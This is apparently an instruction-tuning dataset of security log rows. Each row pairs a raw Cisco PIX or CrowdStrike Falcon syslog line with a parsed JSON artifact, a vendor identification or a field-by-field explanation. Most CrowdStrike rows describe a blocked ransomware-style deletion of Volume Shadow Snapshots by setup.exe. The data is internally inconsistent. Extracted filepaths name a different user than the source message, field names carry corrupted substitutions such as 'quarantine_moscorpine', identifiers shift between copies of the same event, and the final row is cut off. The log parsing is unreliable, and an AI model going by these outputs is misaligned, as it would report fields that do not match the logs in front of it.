input_text
stringlengths
52
64.8k
output_text
stringlengths
23
66k
instruction
stringclasses
3 values
<172>Feb 06 2023 13:33:01 10.52.255.1 : %PIX-4-106023: Deny icmp src outside:16.200.121.237 dst inside:212.95.58.70 (type 11, code 0) by access-group "outside"
This is a syslog message from a product called PIX Firewall by Cisco. The following fields were extracted from the message: priority: 172 senderhost: 10.52.255.1 severitylabel: warning tags: ['cisco_pix_deny', 'deny', 'cisco_pix', 'firewall_action'] productids: [0] severitycode: 4 sourceinfo: unknown sensitivity: normal facilitylabel: local5 messagetype: firewall_action vendorcode: PIX-4-106023 action: block protocol: 1 facilitycode: 21 streamName: cisco_pix clientIP: 16.200.121.237 serverIP: 212.95.58.70
Explain this syslog message
WitFoo-Artifact ::: message={"device_id":"3810ea13b98a42adb0ff227fbaf6169f","timestamp":"2023-06-12T13:04:28Z","behavior_id":"458","filename":"setup.exe","filepath":"\\Device\\HarddiskVolume3\\Users\\janedoe\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe","alleged_filetype":"exe","cmdline":"C:\\Users\\STEVEN~1\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe /clone_wait \"/W32:8923024:1024\"","scenario":"ransomware","objective":"Follow Through","tactic":"Impact","tactic_id":"TA0040","technique":"Inhibit System Recovery","technique_id":"T1490","display_name":"VolumeShadowSnapshotDeleted","description":"A process attempted to delete a Volume Shadow Snapshot.","severity":50,"confidence":60,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"janedoe","user_id":"S-1-12-1-942142572-1204970278-157880471-3270697999","control_graph_id":"ctg:3810ea13b98a42adb0ff227fbaf6169f:17183496355","triggering_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:1607035893889","sha256":"3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249","md5":"8ca190715cd1b0f67a9e14ecbc7bc27e","parent_details":{"parent_sha256":"4070ac7249ec3a90c1119236726050a34bb50110e1a7095f4855b1f7b9524eee","parent_md5":"ab7850166bd390bb01602ddc766cc662","parent_cmdline":"\"C:\\Users\\janedoe\\Downloads\\TMVirtualPortDriver870a.exe\" ","parent_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:1607032416516"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_moscorpine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=193.147.180.105 ::: fileHash=3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249 ::: fileName=setup.exe ::: filePath=\Device\HarddiskVolume3\Users\janedoe\AppData\Local\Temp\{3D7277B3-B0BE-497C-A626-55F063254B5B}\setup.exe ::: userName=janedoe ::: clientMAC=00155d4a00da ::: created_at=2023-06-12T13:04:28Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-06-12T13:04:28Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch
{ "clienthostname": "SSTEWART-LT3.undefined", "clientmac": "00155d4a00da", "filehash": "3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249", "filename": "setup.exe", "filepath": "\\Device\\HarddiskVolume3\\Users\\StevenStewart\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe", "message": "WitFoo-Artifact ::: message={\"device_id\":\"3810ea13b98a42adb0ff227fbaf6169f\",\"timestamp\":\"2023-06-12T13:04:28Z\",\"behavior_id\":\"458\",\"filename\":\"setup.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume3\\\\Users\\\\janedoe\\\\AppData\\\\Local\\\\Temp\\\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\\\setup.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"C:\\\\Users\\\\STEVEN~1\\\\AppData\\\\Local\\\\Temp\\\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\\\setup.exe /clone_wait \\\"/W32:8923024:1024\\\"\",\"scenario\":\"ransomware\",\"objective\":\"Follow Through\",\"tactic\":\"Impact\",\"tactic_id\":\"TA0040\",\"technique\":\"Inhibit System Recovery\",\"technique_id\":\"T1490\",\"display_name\":\"VolumeShadowSnapshotDeleted\",\"description\":\"A process attempted to delete a Volume Shadow Snapshot.\",\"severity\":50,\"confidence\":60,\"ioc_type\":\"\",\"ioc_value\":\"\",\"ioc_source\":\"\",\"ioc_description\":\"\",\"user_name\":\"janedoe\",\"user_id\":\"S-1-12-1-942142572-1204970278-157880471-3270697999\",\"control_graph_id\":\"ctg:3810ea13b98a42adb0ff227fbaf6169f:17183496355\",\"triggering_process_graph_id\":\"pid:3810ea13b98a42adb0ff227fbaf6169f:1607035893889\",\"sha256\":\"3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249\",\"md5\":\"8ca190715cd1b0f67a9e14ecbc7bc27e\",\"parent_details\":{\"parent_sha256\":\"4070ac7249ec3a90c1119236726050a34bb50110e1a7095f4855b1f7b9524eee\",\"parent_md5\":\"ab7850166bd390bb01602ddc766cc662\",\"parent_cmdline\":\"\\\"C:\\\\Users\\\\janedoe\\\\Downloads\\\\TMVirtualPortDriver870a.exe\\\" \",\"parent_process_graph_id\":\"pid:3810ea13b98a42adb0ff227fbaf6169f:1607032416516\"},\"pattern_disposition\":1024,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_moscorpine\":false,\"quarantine_file\":false,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":true,\"process_blocked\":false,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=193.147.180.105 ::: fileHash=3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249 ::: fileName=setup.exe ::: filePath=\\Device\\HarddiskVolume3\\Users\\janedoe\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe ::: userName=janedoe ::: clientMAC=00155d4a00da ::: created_at=2023-06-12T13:04:28Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-06-12T13:04:28Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch", "messagetype": "endpoint_protection_event", "productids": [ 7 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "severitycode": 4, "severitylabel": "warning", "sourceinfo": "unknown", "starttimeutc": "2023-06-12T13:04:28Z", "tags": [ "Crowdstrike Detection", "endpoint_protection_event" ], "streamName": "Crowdstrike Detection", "clientIP": "193.147.180.105", "userName": "janedoe" }
Create a JSON artifact from the message
WitFoo-Artifact ::: message={"device_id":"3810ea13b98a42adb0ff227fbaf6169f","timestamp":"2023-06-12T13:04:28Z","behavior_id":"458","filename":"setup.exe","filepath":"\\Device\\HarddiskVolume3\\Users\\janedoe\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe","alleged_filetype":"exe","cmdline":"C:\\Users\\STEVEN~1\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe /clone_wait \"/W32:8923024:1024\"","scenario":"ransomware","objective":"Follow Through","tactic":"Impact","tactic_id":"TA0040","technique":"Inhibit System Recovery","technique_id":"T1490","display_name":"VolumeShadowSnapshotDeleted","description":"A process attempted to delete a Volume Shadow Snapshot.","severity":50,"confidence":60,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"janedoe","user_id":"S-1-12-1-942142572-1204970278-157880471-3270697999","control_graph_id":"ctg:3810ea13b98a42adb0ff227fbaf6169f:17183496355","triggering_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:1607035893889","sha256":"3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249","md5":"8ca190715cd1b0f67a9e14ecbc7bc27e","parent_details":{"parent_sha256":"4070ac7249ec3a90c1119236726050a34bb50110e1a7095f4855b1f7b9524eee","parent_md5":"ab7850166bd390bb01602ddc766cc662","parent_cmdline":"\"C:\\Users\\janedoe\\Downloads\\TMVirtualPortDriver870a.exe\" ","parent_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:1607032416516"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_moscorpine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=193.147.180.105 ::: fileHash=3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249 ::: fileName=setup.exe ::: filePath=\Device\HarddiskVolume3\Users\janedoe\AppData\Local\Temp\{3D7277B3-B0BE-497C-A626-55F063254B5B}\setup.exe ::: userName=janedoe ::: clientMAC=00155d4a00da ::: created_at=2023-06-12T13:04:28Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-06-12T13:04:28Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch
Product: Falcon Vendor: Crowdstrike
Identify this syslog message
WitFoo-Artifact ::: message={"device_id":"3810ea13b98a42adb0ff227fbaf6169f","timestamp":"2023-06-12T13:04:28Z","behavior_id":"458","filename":"setup.exe","filepath":"\\Device\\HarddiskVolume3\\Users\\janedoe\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe","alleged_filetype":"exe","cmdline":"C:\\Users\\STEVEN~1\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe /clone_wait \"/W32:8923024:1024\"","scenario":"ransomware","objective":"Follow Through","tactic":"Impact","tactic_id":"TA0040","technique":"Inhibit System Recovery","technique_id":"T1490","display_name":"VolumeShadowSnapshotDeleted","description":"A process attempted to delete a Volume Shadow Snapshot.","severity":50,"confidence":60,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"janedoe","user_id":"S-1-12-1-942142572-1204970278-157880471-3270697999","control_graph_id":"ctg:3810ea13b98a42adb0ff227fbaf6169f:17183496355","triggering_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:1607035893889","sha256":"3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249","md5":"8ca190715cd1b0f67a9e14ecbc7bc27e","parent_details":{"parent_sha256":"4070ac7249ec3a90c1119236726050a34bb50110e1a7095f4855b1f7b9524eee","parent_md5":"ab7850166bd390bb01602ddc766cc662","parent_cmdline":"\"C:\\Users\\janedoe\\Downloads\\TMVirtualPortDriver870a.exe\" ","parent_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:1607032416516"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_moscorpine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=193.147.180.105 ::: fileHash=3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249 ::: fileName=setup.exe ::: filePath=\Device\HarddiskVolume3\Users\janedoe\AppData\Local\Temp\{3D7277B3-B0BE-497C-A626-55F063254B5B}\setup.exe ::: userName=janedoe ::: clientMAC=00155d4a00da ::: created_at=2023-06-12T13:04:28Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-06-12T13:04:28Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message: clienthostname: SSTEWART-LT3.undefined clientmac: 00155d4a00da filehash: 3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249 filename: setup.exe filepath: \Device\HarddiskVolume3\Users\StevenStewart\AppData\Local\Temp\{3D7277B3-B0BE-497C-A626-55F063254B5B}\setup.exe messagetype: endpoint_protection_event productids: [7] senderhost: kafka.precinct sensitivity: normal severitycode: 4 severitylabel: warning sourceinfo: unknown starttimeutc: 2023-06-12T13:04:28Z tags: ['Crowdstrike Detection', 'endpoint_protection_event'] streamName: Crowdstrike Detection clientIP: 193.147.180.105 userName: janedoe
Explain this syslog message
WitFoo-Artifact ::: message={"device_id":"3810ea13b98a42adb0ff227fbaf6169f","timestamp":"2023-06-12T13:04:28Z","behavior_id":"458","filename":"setup.exe","filepath":"\\Device\\HarddiskVolume3\\Users\\janedoe\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe","alleged_filetype":"exe","cmdline":"C:\\Users\\STEVEN~1\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe /clone_wait \"/W32:8923024:1024\"","scenario":"ransomware","objective":"Follow Through","tactic":"Impact","tactic_id":"TA0040","technique":"Inhibit System Recovery","technique_id":"T1490","display_name":"VolumeShadowSnapshotDeleted","description":"A process attempted to delete a Volume Shadow Snapshot.","severity":50,"confidence":60,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"janedoe","user_id":"S-1-12-1-942142572-1204970278-157880471-3270697999","control_graph_id":"ctg:3810ea13b98a42adb0ff227fbaf6169f:17183496355","triggering_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:1607035893889","sha256":"3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249","md5":"8ca190715cd1b0f67a9e14ecbc7bc27e","parent_details":{"parent_sha256":"4070ac7249ec3a90c1119236726050a34bb50110e1a7095f4855b1f7b9524eee","parent_md5":"ab7850166bd390bb01602ddc766cc662","parent_cmdline":"\"C:\\Users\\janedoe\\Downloads\\TMVirtualPortDriver870a.exe\" ","parent_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:1607032416516"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mwayneine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=241.184.182.5 ::: fileHash=3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249 ::: fileName=setup.exe ::: filePath=\Device\HarddiskVolume3\Users\janedoe\AppData\Local\Temp\{3D7277B3-B0BE-497C-A626-55F063254B5B}\setup.exe ::: userName=janedoe ::: clientMAC=00155d4a00da ::: created_at=2023-06-12T13:04:28Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-06-12T13:04:28Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch
{ "clienthostname": "SSTEWART-LT3.undefined", "clientmac": "00155d4a00da", "filehash": "3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249", "filename": "setup.exe", "filepath": "\\Device\\HarddiskVolume3\\Users\\StevenStewart\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe", "message": "WitFoo-Artifact ::: message={\"device_id\":\"3810ea13b98a42adb0ff227fbaf6169f\",\"timestamp\":\"2023-06-12T13:04:28Z\",\"behavior_id\":\"458\",\"filename\":\"setup.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume3\\\\Users\\\\janedoe\\\\AppData\\\\Local\\\\Temp\\\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\\\setup.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"C:\\\\Users\\\\STEVEN~1\\\\AppData\\\\Local\\\\Temp\\\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\\\setup.exe /clone_wait \\\"/W32:8923024:1024\\\"\",\"scenario\":\"ransomware\",\"objective\":\"Follow Through\",\"tactic\":\"Impact\",\"tactic_id\":\"TA0040\",\"technique\":\"Inhibit System Recovery\",\"technique_id\":\"T1490\",\"display_name\":\"VolumeShadowSnapshotDeleted\",\"description\":\"A process attempted to delete a Volume Shadow Snapshot.\",\"severity\":50,\"confidence\":60,\"ioc_type\":\"\",\"ioc_value\":\"\",\"ioc_source\":\"\",\"ioc_description\":\"\",\"user_name\":\"janedoe\",\"user_id\":\"S-1-12-1-942142572-1204970278-157880471-3270697999\",\"control_graph_id\":\"ctg:3810ea13b98a42adb0ff227fbaf6169f:17183496355\",\"triggering_process_graph_id\":\"pid:3810ea13b98a42adb0ff227fbaf6169f:1607035893889\",\"sha256\":\"3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249\",\"md5\":\"8ca190715cd1b0f67a9e14ecbc7bc27e\",\"parent_details\":{\"parent_sha256\":\"4070ac7249ec3a90c1119236726050a34bb50110e1a7095f4855b1f7b9524eee\",\"parent_md5\":\"ab7850166bd390bb01602ddc766cc662\",\"parent_cmdline\":\"\\\"C:\\\\Users\\\\janedoe\\\\Downloads\\\\TMVirtualPortDriver870a.exe\\\" \",\"parent_process_graph_id\":\"pid:3810ea13b98a42adb0ff227fbaf6169f:1607032416516\"},\"pattern_disposition\":1024,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_mwayneine\":false,\"quarantine_file\":false,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":true,\"process_blocked\":false,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=241.184.182.5 ::: fileHash=3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249 ::: fileName=setup.exe ::: filePath=\\Device\\HarddiskVolume3\\Users\\janedoe\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe ::: userName=janedoe ::: clientMAC=00155d4a00da ::: created_at=2023-06-12T13:04:28Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-06-12T13:04:28Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch", "messagetype": "endpoint_protection_event", "productids": [ 7 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "severitycode": 4, "severitylabel": "warning", "sourceinfo": "unknown", "starttimeutc": "2023-06-12T13:04:28Z", "tags": [ "Crowdstrike Detection", "endpoint_protection_event" ], "streamName": "Crowdstrike Detection", "clientIP": "241.184.182.5", "userName": "janedoe" }
Create a JSON artifact from the message
WitFoo-Artifact ::: message={"device_id":"3810ea13b98a42adb0ff227fbaf6169f","timestamp":"2023-06-12T13:04:28Z","behavior_id":"458","filename":"setup.exe","filepath":"\\Device\\HarddiskVolume3\\Users\\janedoe\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe","alleged_filetype":"exe","cmdline":"C:\\Users\\STEVEN~1\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe /clone_wait \"/W32:8923024:1024\"","scenario":"ransomware","objective":"Follow Through","tactic":"Impact","tactic_id":"TA0040","technique":"Inhibit System Recovery","technique_id":"T1490","display_name":"VolumeShadowSnapshotDeleted","description":"A process attempted to delete a Volume Shadow Snapshot.","severity":50,"confidence":60,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"janedoe","user_id":"S-1-12-1-942142572-1204970278-157880471-3270697999","control_graph_id":"ctg:3810ea13b98a42adb0ff227fbaf6169f:17183496355","triggering_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:1607035893889","sha256":"3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249","md5":"8ca190715cd1b0f67a9e14ecbc7bc27e","parent_details":{"parent_sha256":"4070ac7249ec3a90c1119236726050a34bb50110e1a7095f4855b1f7b9524eee","parent_md5":"ab7850166bd390bb01602ddc766cc662","parent_cmdline":"\"C:\\Users\\janedoe\\Downloads\\TMVirtualPortDriver870a.exe\" ","parent_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:1607032416516"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mwayneine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=241.184.182.5 ::: fileHash=3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249 ::: fileName=setup.exe ::: filePath=\Device\HarddiskVolume3\Users\janedoe\AppData\Local\Temp\{3D7277B3-B0BE-497C-A626-55F063254B5B}\setup.exe ::: userName=janedoe ::: clientMAC=00155d4a00da ::: created_at=2023-06-12T13:04:28Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-06-12T13:04:28Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch
Product: Falcon Vendor: Crowdstrike
Identify this syslog message
WitFoo-Artifact ::: message={"device_id":"3810ea13b98a42adb0ff227fbaf6169f","timestamp":"2023-06-12T13:04:28Z","behavior_id":"458","filename":"setup.exe","filepath":"\\Device\\HarddiskVolume3\\Users\\janedoe\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe","alleged_filetype":"exe","cmdline":"C:\\Users\\STEVEN~1\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe /clone_wait \"/W32:8923024:1024\"","scenario":"ransomware","objective":"Follow Through","tactic":"Impact","tactic_id":"TA0040","technique":"Inhibit System Recovery","technique_id":"T1490","display_name":"VolumeShadowSnapshotDeleted","description":"A process attempted to delete a Volume Shadow Snapshot.","severity":50,"confidence":60,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"janedoe","user_id":"S-1-12-1-942142572-1204970278-157880471-3270697999","control_graph_id":"ctg:3810ea13b98a42adb0ff227fbaf6169f:17183496355","triggering_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:1607035893889","sha256":"3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249","md5":"8ca190715cd1b0f67a9e14ecbc7bc27e","parent_details":{"parent_sha256":"4070ac7249ec3a90c1119236726050a34bb50110e1a7095f4855b1f7b9524eee","parent_md5":"ab7850166bd390bb01602ddc766cc662","parent_cmdline":"\"C:\\Users\\janedoe\\Downloads\\TMVirtualPortDriver870a.exe\" ","parent_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:1607032416516"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mwayneine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=241.184.182.5 ::: fileHash=3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249 ::: fileName=setup.exe ::: filePath=\Device\HarddiskVolume3\Users\janedoe\AppData\Local\Temp\{3D7277B3-B0BE-497C-A626-55F063254B5B}\setup.exe ::: userName=janedoe ::: clientMAC=00155d4a00da ::: created_at=2023-06-12T13:04:28Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-06-12T13:04:28Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message: clienthostname: SSTEWART-LT3.undefined clientmac: 00155d4a00da filehash: 3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249 filename: setup.exe filepath: \Device\HarddiskVolume3\Users\StevenStewart\AppData\Local\Temp\{3D7277B3-B0BE-497C-A626-55F063254B5B}\setup.exe messagetype: endpoint_protection_event productids: [7] senderhost: kafka.precinct sensitivity: normal severitycode: 4 severitylabel: warning sourceinfo: unknown starttimeutc: 2023-06-12T13:04:28Z tags: ['Crowdstrike Detection', 'endpoint_protection_event'] streamName: Crowdstrike Detection clientIP: 241.184.182.5 userName: janedoe
Explain this syslog message
WitFoo-Artifact ::: message={"device_id":"3810ea13b98a42adb0ff227fbaf6169f","timestamp":"2023-06-12T13:04:28Z","behavior_id":"458","filename":"setup.exe","filepath":"\\Device\\HarddiskVolume3\\Users\\charlie\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe","alleged_filetype":"exe","cmdline":"C:\\Users\\STEVEN~1\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe /clone_wait \"/W32:8923024:1024\"","scenario":"ransomware","objective":"Follow Through","tactic":"Impact","tactic_id":"TA0040","technique":"Inhibit System Recovery","technique_id":"T1490","display_name":"VolumeShadowSnapshotDeleted","description":"A process attempted to delete a Volume Shadow Snapshot.","severity":50,"confidence":60,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"charlie","user_id":"S-1-12-1-942142572-1204970278-157880471-3270697999","control_graph_id":"ctg:3810ea13b98a42adb0ff227fbaf6169f:17183496355","triggering_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:1607035893889","sha256":"3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249","md5":"8ca190715cd1b0f67a9e14ecbc7bc27e","parent_details":{"parent_sha256":"4070ac7249ec3a90c1119236726050a34bb50110e1a7095f4855b1f7b9524eee","parent_md5":"ab7850166bd390bb01602ddc766cc662","parent_cmdline":"\"C:\\Users\\charlie\\Downloads\\TMVirtualPortDriver870a.exe\" ","parent_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:1607032416516"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_macmeine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=33.80.171.219 ::: fileHash=3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249 ::: fileName=setup.exe ::: filePath=\Device\HarddiskVolume3\Users\charlie\AppData\Local\Temp\{3D7277B3-B0BE-497C-A626-55F063254B5B}\setup.exe ::: userName=charlie ::: clientMAC=00155d4a00da ::: created_at=2023-06-12T13:04:28Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-06-12T13:04:28Z ::: clientHostname=SSTEWART-LT3.undefined ::: 